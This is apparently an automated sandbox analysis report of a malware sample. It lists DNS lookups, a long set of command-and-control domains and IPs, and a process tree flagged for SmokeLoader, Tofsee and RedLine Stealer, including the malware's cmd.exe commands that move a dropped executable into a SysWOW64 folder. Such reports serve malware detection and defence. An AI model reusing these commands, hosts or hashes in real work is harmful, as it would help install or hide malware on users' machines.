                                                                                                                                                                                                        Jan 4, 2022 19:33:55.895823956 CET8.8.8.8192.168.2.50x6dd4No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.909377098 CET8.8.8.8192.168.2.50xb791No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.112481117 CET8.8.8.8192.168.2.50xb3a8No error (0)natribu.org178.248.232.78A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.378345013 CET8.8.8.8192.168.2.50x463No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.710943937 CET8.8.8.8192.168.2.50xeeb3No error (0)natribu.org178.248.232.78A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.901292086 CET8.8.8.8192.168.2.50x6c1fNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:57.376915932 CET8.8.8.8192.168.2.50xd80fNo error (0)data-host-coin-8.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:57.669960976 CET8.8.8.8192.168.2.50x77faNo error (0)mstdn.social116.202.14.219A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.163434982 CET8.8.8.8192.168.2.50x9f39No error (0)qoto.org51.91.13.105A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.680798054 CET8.8.8.8192.168.2.50x21acNo error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:01.027271986 CET8.8.8.8192.168.2.50x38e7No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at151.251.30.69A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at152.0.118.227A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at187.156.124.76A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at197.44.54.172A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at189.129.105.161A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at61.98.7.132A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at175.126.109.15A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.271924019 CET8.8.8.8192.168.2.50xcf58No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.645013094 CET8.8.8.8192.168.2.50x99No error (0)patmushta.info194.87.235.183A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:13.969244003 CET8.8.8.8192.168.2.50x644dNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:13.969244003 CET8.8.8.8192.168.2.50x644dNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:13.969244003 CET8.8.8.8192.168.2.50x644dNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:13.969244003 CET8.8.8.8192.168.2.50x644dNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:13.969244003 CET8.8.8.8192.168.2.50x644dNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:13.969244003 CET8.8.8.8192.168.2.50x644dNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:15.665023088 CET8.8.8.8192.168.2.50xfa2cNo error (0)f0616071.xsph.ru141.8.193.236A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:18.436789989 CET8.8.8.8192.168.2.50x635bNo error (0)f0616073.xsph.ru141.8.193.236A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:26.044899940 CET8.8.8.8192.168.2.50xc663No error (0)kent0mushinec0n3t.casacam.net95.143.179.186A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:53.007128000 CET8.8.8.8192.168.2.50x6309No error (0)patmushta.info194.87.235.183A (IP address)IN (0x0001)

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • mnxwgte.com
                                                                                                                                                                                                          • host-data-coin-11.com
                                                                                                                                                                                                        • fcsijwjo.com
                                                                                                                                                                                                        • privacytools-foryou-777.com
                                                                                                                                                                                                        • xxvce.org
                                                                                                                                                                                                        • nbivn.net
                                                                                                                                                                                                        • mqtuiygbd.org
                                                                                                                                                                                                        • hyipaj.net
                                                                                                                                                                                                        • ixfmgcxna.org
                                                                                                                                                                                                        • hcnexlv.com
                                                                                                                                                                                                        • shqbxq.com
                                                                                                                                                                                                        • mrxnaw.com
                                                                                                                                                                                                        • data-host-coin-8.com
                                                                                                                                                                                                        • kyrrypaj.net
                                                                                                                                                                                                        • wpjrovehat.org
                                                                                                                                                                                                        • gemicjpf.com
                                                                                                                                                                                                        • kgdrt.com
                                                                                                                                                                                                        • pbwsr.com
                                                                                                                                                                                                        • unicupload.top
                                                                                                                                                                                                        • tinpgbjvs.net
                                                                                                                                                                                                        • trkju.org
                                                                                                                                                                                                        • affpnhtco.com
                                                                                                                                                                                                        • biuigjh.net
                                                                                                                                                                                                        • bbqijtelr.com
                                                                                                                                                                                                        • ergvrb.org
                                                                                                                                                                                                        • dcppl.net
                                                                                                                                                                                                        • 185.7.214.171:8080
                                                                                                                                                                                                        • gnleqagbe.net
                                                                                                                                                                                                        • ffijaqcca.net
                                                                                                                                                                                                        • edakogho.org
                                                                                                                                                                                                        • ccihwcxvgc.net
                                                                                                                                                                                                        • vnhfrdnsx.net
                                                                                                                                                                                                        • nbajd.com
                                                                                                                                                                                                        • sehol.com
                                                                                                                                                                                                          • amogohuigotuli.at
                                                                                                                                                                                                        • qquvonfakj.net
                                                                                                                                                                                                        • rqgjiitwa.com
                                                                                                                                                                                                        • wkshgd.net
                                                                                                                                                                                                        • lpdsum.com
                                                                                                                                                                                                        • pefdgmtoj.com
                                                                                                                                                                                                        • 91.243.44.130
                                                                                                                                                                                                        • opjngj.com
                                                                                                                                                                                                        • rbkjpfevn.com
                                                                                                                                                                                                        • unic11m.top
                                                                                                                                                                                                        • xujjips.org
                                                                                                                                                                                                        • luqilpnni.org
                                                                                                                                                                                                        • smurvjp.com
                                                                                                                                                                                                        • pbysostxi.net
                                                                                                                                                                                                        • xggvos.org
                                                                                                                                                                                                        • upxogvba.net
                                                                                                                                                                                                        • qjoorlrk.org
                                                                                                                                                                                                        • tahqfcsy.com
                                                                                                                                                                                                        • tuosodl.net
                                                                                                                                                                                                        • 185.7.214.239
                                                                                                                                                                                                        • mnrycwnvnv.com
                                                                                                                                                                                                        • lqhxjo.org
                                                                                                                                                                                                        • hhtdbo.net
                                                                                                                                                                                                        • pcfbatp.net
                                                                                                                                                                                                        • yytvtctaug.net
                                                                                                                                                                                                        • lmpxg.com
                                                                                                                                                                                                        • nxxtbccl.net
                                                                                                                                                                                                        • uqmves.org
                                                                                                                                                                                                        • xhxsjp.org
                                                                                                                                                                                                        • skgfhxg.org
                                                                                                                                                                                                        • qlaiw.org
                                                                                                                                                                                                        • qopqxs.net
                                                                                                                                                                                                        • cqutypagk.com
                                                                                                                                                                                                        • ahkpouvwup.com
                                                                                                                                                                                                        • gxtcaqi.org
                                                                                                                                                                                                        • hrsmjturj.org
                                                                                                                                                                                                        • jwmtctjvqt.org
                                                                                                                                                                                                        • amqeeswq.net
                                                                                                                                                                                                        • f0616068.xsph.ru
                                                                                                                                                                                                        • gnnwam.com
                                                                                                                                                                                                        • hwgkv.com
                                                                                                                                                                                                        • fleiunffw.com
                                                                                                                                                                                                        • vk.com
                                                                                                                                                                                                        • ouwak.org
                                                                                                                                                                                                        • gyuyyjn.com
                                                                                                                                                                                                        • natribu.org
                                                                                                                                                                                                        • sxetmnxgu.com
                                                                                                                                                                                                        • whjllmlg.org
                                                                                                                                                                                                        • jjrpdilcbv.org
                                                                                                                                                                                                        • 65.108.180.72
                                                                                                                                                                                                        • 116.202.186.120
                                                                                                                                                                                                        • ersxoxafng.com
                                                                                                                                                                                                        • f0616071.xsph.ru
                                                                                                                                                                                                        • f0616073.xsph.ru

                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        Analysis Process: nkINykHreE.exe PID: 800 Parent PID: 1544

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:03
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\nkINykHreE.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\nkINykHreE.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:343040 bytes
                                                                                                                                                                                                        MD5 hash:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: nkINykHreE.exe PID: 3092 Parent PID: 800

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:05
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\nkINykHreE.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\nkINykHreE.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:343040 bytes
                                                                                                                                                                                                        MD5 hash:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.297306514.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.297326406.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: explorer.exe PID: 3472 Parent PID: 3092

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:11
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                                                                                                        File size:3933184 bytes
                                                                                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 6444 Parent PID: 556

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:13
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 6644 Parent PID: 556

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:23
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 6720 Parent PID: 556

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:24
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 6816 Parent PID: 556

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:24
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: SgrmBroker.exe PID: 6868 Parent PID: 556

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:25
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                                                                                        File size:163336 bytes
                                                                                                                                                                                                        MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 6888 Parent PID: 556

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:26
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: haifbcd PID: 2908 Parent PID: 904

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:47
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\haifbcd
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\haifbcd
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:343040 bytes
                                                                                                                                                                                                        MD5 hash:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: 115B.exe PID: 340 Parent PID: 3472

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:47
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\115B.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\115B.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:343040 bytes
                                                                                                                                                                                                        MD5 hash:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: haifbcd PID: 4544 Parent PID: 2908

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:49
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\haifbcd
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\haifbcd
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:343040 bytes
                                                                                                                                                                                                        MD5 hash:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.352429754.0000000002091000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.352266837.00000000005C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: 115B.exe PID: 1412 Parent PID: 340

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:50
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\115B.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\115B.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:343040 bytes
                                                                                                                                                                                                        MD5 hash:DC67C627917FF9724F3C1E6DB5F2DC27
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: 2997.exe PID: 6936 Parent PID: 3472

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:32:57
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\2997.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\2997.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:358912 bytes
                                                                                                                                                                                                        MD5 hash:1F935BFFF0F8128972BC69625E5B2A6C
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.370019662.0000000000620000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: 18D.exe PID: 4992 Parent PID: 3472

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:02
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\18D.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\18D.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:342528 bytes
                                                                                                                                                                                                        MD5 hash:B7B184D2B0910148CABB9B5E915753D6
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000012.00000002.390911110.0000000000540000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000012.00000002.390725871.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000012.00000003.369452134.0000000000560000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                        Analysis Process: CBA.exe PID: 5652 Parent PID: 3472

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:05
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\CBA.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\CBA.exe
                                                                                                                                                                                                        Imagebase:0xcb0000
                                                                                                                                                                                                        File size:539136 bytes
                                                                                                                                                                                                        MD5 hash:6C72997AA5DD44A44B27BD36347BAED9
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                        Analysis Process: cmd.exe PID: 6552 Parent PID: 4992

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:08
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dbgxuqbr\
                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 5032 Parent PID: 6552

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:08
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: cmd.exe PID: 1768 Parent PID: 4992

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:09
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\
                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 4996 Parent PID: 1768

                                                                                                                                                                                                        General

